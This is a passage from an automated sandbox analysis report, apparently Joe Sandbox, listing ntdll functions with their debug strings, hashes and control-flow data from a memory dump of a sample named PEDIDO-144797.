                                                                                                                                          • Instruction Fuzzy Hash: 22A17E766043118FEB04CE1CC894A2AB7E6FF88354F14496DEA45DB361EB72EC46CB91
                                                                                                                                          Function 326D7550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 585 326d7550-326d7571 586 326d75ab-326d75b9 call 326e4b50 585->586 587 326d7573-326d758f call 326ae580 585->587 592 32714443 587->592 593 326d7595-326d75a2 587->593 597 3271444a-32714450 592->597 594 326d75ba-326d75c9 call 326d7738 593->594 595 326d75a4 593->595 601 326d75cb-326d75e1 call 326d76ed 594->601 602 326d7621-326d762a 594->602 595->586 599 32714456-327144c3 call 3272ef10 call 326e8f40 RtlDebugPrintTimes BaseQueryModuleData 597->599 600 326d75e7-326d75f0 call 326d7648 597->600 599->600 617 327144c9-327144d1 599->617 600->602 613 326d75f2 600->613 601->597 601->600 605 326d75f8-326d7601 602->605 610 326d762c-326d762e 605->610 611 326d7603-326d7612 call 326d763b 605->611 616 326d7614-326d7616 610->616 611->616 613->605 619 326d7618-326d761a 616->619 620 326d7630-326d7639 616->620 617->600 621 327144d7-327144de 617->621 619->595 622 326d761c 619->622 620->619 621->600 623 327144e4-327144ef 621->623 624 327145c9-327145db call 326e2b70 622->624 625 327144f5-3271452e call 3272ef10 call 326ea9c0 623->625 626 327145c4 call 326e4c68 623->626 624->595 634 32714530-32714541 call 3272ef10 625->634 635 32714546-32714576 call 3272ef10 625->635 626->624 634->602 635->600 640 3271457c-3271458a call 326ea690 635->640 643 32714591-327145ae call 3272ef10 call 3271cc1e 640->643 644 3271458c-3271458e 640->644 643->600 649 327145b4-327145bd 643->649 644->643 649->640 650 327145bf 649->650 650->600
                                                                                                                                          Strings
                                                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 32714460
                                                                                                                                          • ExecuteOptions, xrefs: 327144AB
                                                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 32714507
                                                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 32714530
                                                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3271454D
                                                                                                                                          • Execute=1, xrefs: 3271451E
                                                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 32714592
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                          • API String ID: 0-484625025
                                                                                                                                          • Opcode ID: 0295760d8aa9f4c4ce484f2b8c061f80aca484323066bf6f8c81d7c5a33e6981
                                                                                                                                          • Instruction ID: 040d295c9bfb88cc11cd7053b22cbea129c67617fae19fa70b3f0792a39a120f
                                                                                                                                          • Opcode Fuzzy Hash: 0295760d8aa9f4c4ce484f2b8c061f80aca484323066bf6f8c81d7c5a33e6981
                                                                                                                                          • Instruction Fuzzy Hash: D3510675A0031DAAEB16DAA4DC95FAD73A8FF08354F5004E9D905AB180EF70AE41CF67
                                                                                                                                          Function 326BA170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 327077E2
                                                                                                                                          • Actx , xrefs: 32707819, 32707880
                                                                                                                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32707807
                                                                                                                                          • SsHd, xrefs: 326BA304
                                                                                                                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 327077DD, 32707802
                                                                                                                                          • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 327078F3
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                          • API String ID: 0-1988757188
                                                                                                                                          • Opcode ID: 946a3ba65a2e75aacc2a832e49323f317ef167919dfa441276b6b51053925c63
                                                                                                                                          • Instruction ID: 02243999dda72f2b937c07cf40936ddc315ef12e10e224d8c7941dee1c73e80d
                                                                                                                                          • Opcode Fuzzy Hash: 946a3ba65a2e75aacc2a832e49323f317ef167919dfa441276b6b51053925c63
                                                                                                                                          • Instruction Fuzzy Hash: 08E1F5756043028FEB19CE2ACC90B5A7BE1BF84368F544A2DED55CB291DB31DD49CB82
                                                                                                                                          Function 326BD690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32709153
                                                                                                                                          • Actx , xrefs: 32709315
                                                                                                                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32709178
                                                                                                                                          • GsHd, xrefs: 326BD794
                                                                                                                                          • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 32709372
                                                                                                                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 3270914E, 32709173
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                          • API String ID: 3446177414-2196497285
                                                                                                                                          • Opcode ID: c0ead22aaa65c217a9c1ef10391b4da6b2cdb49f2180d18044fd54457bb48084
                                                                                                                                          • Instruction ID: 786b85987309fa25456a090df32487cd200d52fa7a4bd8a5b666d4a9fb728fd4
                                                                                                                                          • Opcode Fuzzy Hash: c0ead22aaa65c217a9c1ef10391b4da6b2cdb49f2180d18044fd54457bb48084
                                                                                                                                          • Instruction Fuzzy Hash: 72E19E74604341DFEB14CF15C880B4AB7E5BF88B58F408A6DE9959F292DB71E848CF92
                                                                                                                                          Function 3271FA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                          • API String ID: 3446177414-4227709934
                                                                                                                                          • Opcode ID: cda3bd98e2d0e82ce8c2c16f9a357a73c9ff63c362f43876b4eddac2afeb3b60
                                                                                                                                          • Instruction ID: 42c9fbd19650bbbecd8d06c1df96b4bb7ce0ec2cf32f49bd56bab5b163b35489
                                                                                                                                          • Opcode Fuzzy Hash: cda3bd98e2d0e82ce8c2c16f9a357a73c9ff63c362f43876b4eddac2afeb3b60
                                                                                                                                          • Instruction Fuzzy Hash: AF416DB9A01309AFDB01CF94C980ADEBBB6FF48754F100169EC04BB351DB75AA42CB91
                                                                                                                                          Function 3274F8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                                          • API String ID: 3446177414-3492000579
                                                                                                                                          • Opcode ID: 50586720c6dc5d57bffe66b2959c9d1ae3269c2b29dd0de61938f3660abe48a1
                                                                                                                                          • Instruction ID: b6d01699051f54d190256942bf66ff6af998d34439d79901fea0634c9fd4f6d0
                                                                                                                                          • Opcode Fuzzy Hash: 50586720c6dc5d57bffe66b2959c9d1ae3269c2b29dd0de61938f3660abe48a1
                                                                                                                                          • Instruction Fuzzy Hash: 7071F175A01689DFDB02CFA8D490AADFBF2FF4A314F04805AE445AF251CF719982CB55
                                                                                                                                          Function 32696565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 326F9854, 326F9895
                                                                                                                                          • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 326F9843
                                                                                                                                          • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 326F9885
                                                                                                                                          • LdrpLoadShimEngine, xrefs: 326F984A, 326F988B
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                          • API String ID: 3446177414-3589223738
                                                                                                                                          • Opcode ID: 70e656b24dfb28b44bc13a6c4ad166cce7f51239e8bba95be21f860c832c0cc8
                                                                                                                                          • Instruction ID: 03b74b64a03844fefdfd4800b898854ed3f2b2ebc4328195bedfa4921f53a920
                                                                                                                                          • Opcode Fuzzy Hash: 70e656b24dfb28b44bc13a6c4ad166cce7f51239e8bba95be21f860c832c0cc8
                                                                                                                                          • Instruction Fuzzy Hash: A0511136A01394AFEB14DBA8C894FDD77A2BF40314F140569E511BF295CFB19C82CB82
                                                                                                                                          Function 326CDA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                          • API String ID: 3446177414-3224558752
                                                                                                                                          • Opcode ID: 8bce7c11ec600fd3b3f1bec1911fd9d9aa6efe17a6552ac086855fe2bacd9ffe
                                                                                                                                          • Instruction ID: 1b17d19b1efd7c815cfea97285e52410720748c05abdca8eac2f54ebee9609d5
                                                                                                                                          • Opcode Fuzzy Hash: 8bce7c11ec600fd3b3f1bec1911fd9d9aa6efe17a6552ac086855fe2bacd9ffe
                                                                                                                                          • Instruction Fuzzy Hash: 6F416975604750DFE306DF68C484B4AB3E5FF41324F0489A9EC059B282CF79A986CF92
                                                                                                                                          Function 326CDAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                          • API String ID: 3446177414-1222099010
                                                                                                                                          • Opcode ID: 05ab1f13c948bb91cf0295ec81a10160e0c89361188c7d4fd14893c1a39f5330
                                                                                                                                          • Instruction ID: 35104b00117d8b1f5433c49d7ed2af1437f31b40542d59f37d9ee87f618aac23
                                                                                                                                          • Opcode Fuzzy Hash: 05ab1f13c948bb91cf0295ec81a10160e0c89361188c7d4fd14893c1a39f5330
                                                                                                                                          • Instruction Fuzzy Hash: A73159B51157D4DFE726DB28C418F8A77E8FF01768F044498E8014B652CFB5E986CE52
                                                                                                                                          Function 326A9046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: $$@
                                                                                                                                          • API String ID: 3446177414-1194432280
                                                                                                                                          • Opcode ID: ea55dcecc0712126bf3a2d621a147fc2b2d236fa2ea3f815d3233f3442d47f5f
                                                                                                                                          • Instruction ID: bb79ec1d2adae6a44f18b3075687882f69084b0e27ec5f179dd8ed00e7cc4692
                                                                                                                                          • Opcode Fuzzy Hash: ea55dcecc0712126bf3a2d621a147fc2b2d236fa2ea3f815d3233f3442d47f5f
                                                                                                                                          • Instruction Fuzzy Hash: C6814AB2D012699BDB25CF54CC45BDEB7B8BF08744F0081EAA909B7240DB709E85CFA5
                                                                                                                                          Function 3269F8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                          • API String ID: 3446177414-3610490719
                                                                                                                                          • Opcode ID: d8538aa2b7fad1f9e8b07f48b65b376af99e4c7108f71190412b5312184763a3
                                                                                                                                          • Instruction ID: 4d4aa20c3538e24520be439b8d4b088426250d08cc642b40f16035fa77a9fc7a
                                                                                                                                          • Opcode Fuzzy Hash: d8538aa2b7fad1f9e8b07f48b65b376af99e4c7108f71190412b5312184763a3
                                                                                                                                          • Instruction Fuzzy Hash: 1391F071704740EFE71ACF24C894BAEBBA9BF84B44F020459E8519B281DFB5E845CBD6
                                                                                                                                          Function 326C0AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 32709F2E
                                                                                                                                          • LdrpCheckModule, xrefs: 32709F24
                                                                                                                                          • Failed to allocated memory for shimmed module list, xrefs: 32709F1C
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                          • API String ID: 3446177414-161242083
                                                                                                                                          • Opcode ID: 40eaf463c7079f37036f149fddffc24f47b0a8576c519ddfcec4ec6495980100
                                                                                                                                          • Instruction ID: c8e4b391267d25f7c4a26cdac620128ede1f780903093acb7c7b50d308bdf765
                                                                                                                                          • Opcode Fuzzy Hash: 40eaf463c7079f37036f149fddffc24f47b0a8576c519ddfcec4ec6495980100
                                                                                                                                          • Instruction Fuzzy Hash: 1371DD75A00715DFEB18EF68C990BAEB7F1FF44708F148469E901AB250EB71AD82CB51
                                                                                                                                          Function 3277A04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                          • Opcode ID: 8107ca1e032108a9bedac8ea8090f38db2009b3d61c0c8d2b4016942ef7d6601
                                                                                                                                          • Instruction ID: 335ee85042d318be1af4ece9a3840126e37d91ece0557ed4f36aa56252399e4e
                                                                                                                                          • Opcode Fuzzy Hash: 8107ca1e032108a9bedac8ea8090f38db2009b3d61c0c8d2b4016942ef7d6601
                                                                                                                                          • Instruction Fuzzy Hash: 2F512579715A12DFFF08CE58C8A4A29B7F2BF89354B104569D906DB760EB72AC41CB80
                                                                                                                                          Function 326D7A4F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 4281723722-0
                                                                                                                                          • Opcode ID: 0b2dc43e2efa831b3191b4a2f373bff2a15b38d12146ef482ca4cbc223a9a183
                                                                                                                                          • Instruction ID: 764f478de5f0ce02c6c15cc0b870d4e93978a1e8800e6c2304b5b9087af97f0c
                                                                                                                                          • Opcode Fuzzy Hash: 0b2dc43e2efa831b3191b4a2f373bff2a15b38d12146ef482ca4cbc223a9a183
                                                                                                                                          • Instruction Fuzzy Hash: E4314075E41228DFCF05CFA8D885A9EBBB1BF48320F10056AE911BB290CB306942CF54
                                                                                                                                          Function 326A58E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @
                                                                                                                                          • API String ID: 0-2766056989
                                                                                                                                          • Opcode ID: b50dacb9b2cdb534bec74f12bc079f1d1c1110c0fdbc087eb8a100d10486e1b1
                                                                                                                                          • Instruction ID: 4c40b4e09b99d5b35062bc46bbdf15e40b5001e6418dce35e7d05449c3dad42d
                                                                                                                                          • Opcode Fuzzy Hash: b50dacb9b2cdb534bec74f12bc079f1d1c1110c0fdbc087eb8a100d10486e1b1
                                                                                                                                          • Instruction Fuzzy Hash: 9E3226B4D003699FEB25CF64C9A4BD9BBB0BF09344F0081E9D549A7291DBB45E88CF91
                                                                                                                                          Function 32748B90 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 298COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: HEAP: ${t2
                                                                                                                                          • API String ID: 0-3603856192
                                                                                                                                          • Opcode ID: 8b609a9a9b5fe58becd317c7437886b586dddf74e3e64ea3de9fd99dd372259d
                                                                                                                                          • Instruction ID: 9662c5fddd5c1706d0d82aaab34708c7084d6d025390e860345079f3d39638ef
                                                                                                                                          • Opcode Fuzzy Hash: 8b609a9a9b5fe58becd317c7437886b586dddf74e3e64ea3de9fd99dd372259d
                                                                                                                                          • Instruction Fuzzy Hash: 27B18A71A0A345DFD710CF29D880A5BBBE6FF85754F404A6EF9949B290DB30D904CB92
                                                                                                                                          Function 326D4B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: 0$Flst
                                                                                                                                          • API String ID: 0-758220159
                                                                                                                                          • Opcode ID: 364c9c6b015ce21a230426abd59ffd8fe4778b58a1924834bcb81664158ceb7f
                                                                                                                                          • Instruction ID: ac2316d812e4c2f606e22748306d4946c644a1bcef2966fa52e1a0c28e411a7c
                                                                                                                                          • Opcode Fuzzy Hash: 364c9c6b015ce21a230426abd59ffd8fe4778b58a1924834bcb81664158ceb7f
                                                                                                                                          • Instruction Fuzzy Hash: 8D519AB5E01348CBEB24CF94C484799FBF5FF44794F14882AD449AB240EBB09D86CB90
                                                                                                                                          Function 326A0485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          • kLsE, xrefs: 326A05FE
                                                                                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 326A0586
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                          • API String ID: 3446177414-2547482624
                                                                                                                                          • Opcode ID: 87154550091c2c2e846a261ea03ae8667d2aa4d884dfdfa48349292a1e34a80c
